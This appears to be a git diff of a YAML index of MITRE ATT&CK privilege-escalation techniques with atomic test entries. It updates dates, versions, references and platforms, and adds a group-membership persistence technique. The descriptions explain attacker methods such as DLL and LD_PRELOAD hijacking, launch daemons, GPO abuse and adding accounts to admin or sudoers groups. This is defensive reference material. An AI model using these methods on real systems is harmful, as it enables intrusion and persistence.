       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -20791,7 +21057,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -20817,6 +21083,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -20844,12 +21114,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -20875,7 +21144,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -20917,7 +21186,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -20995,11 +21263,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -21079,7 +21346,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -21102,7 +21439,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -21150,8 +21487,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -21183,7 +21518,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -21238,13 +21573,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -21305,9 +21638,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -21316,7 +21649,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -21369,7 +21701,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -21390,12 +21722,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -21498,7 +21829,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -21598,12 +21928,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -21616,7 +21945,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -21629,7 +21957,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -21659,7 +21986,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -21686,7 +22014,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -21712,13 +22040,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -21795,12 +22121,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -21819,6 +22144,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -21826,7 +22152,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -21846,34 +22171,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -21909,6 +22236,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -21920,16 +22251,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -21965,12 +22292,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -21978,14 +22305,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -22000,6 +22326,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -22008,18 +22335,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -22051,9 +22378,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -22125,7 +22449,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -22152,7 +22475,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -22178,8 +22501,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests:
     - name: Trap EXIT
@@ -22270,7 +22591,7 @@ privilege-escalation:
         name: sh
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -22391,7 +22712,6 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Shared Library Injection via /etc/ld.so.preload
@@ -22471,7 +22791,7 @@ privilege-escalation:
         name: bash
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -22503,11 +22823,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -22548,11 +22867,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -22608,12 +22926,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -22670,7 +22987,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests:
     - name: Make and modify binary from C source
@@ -22955,7 +23271,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -23065,7 +23380,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests:
     - name: Modify SSH Authorized Keys
@@ -23138,7 +23452,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -23171,13 +23485,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -23239,10 +23551,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -23300,7 +23611,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -23342,7 +23652,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
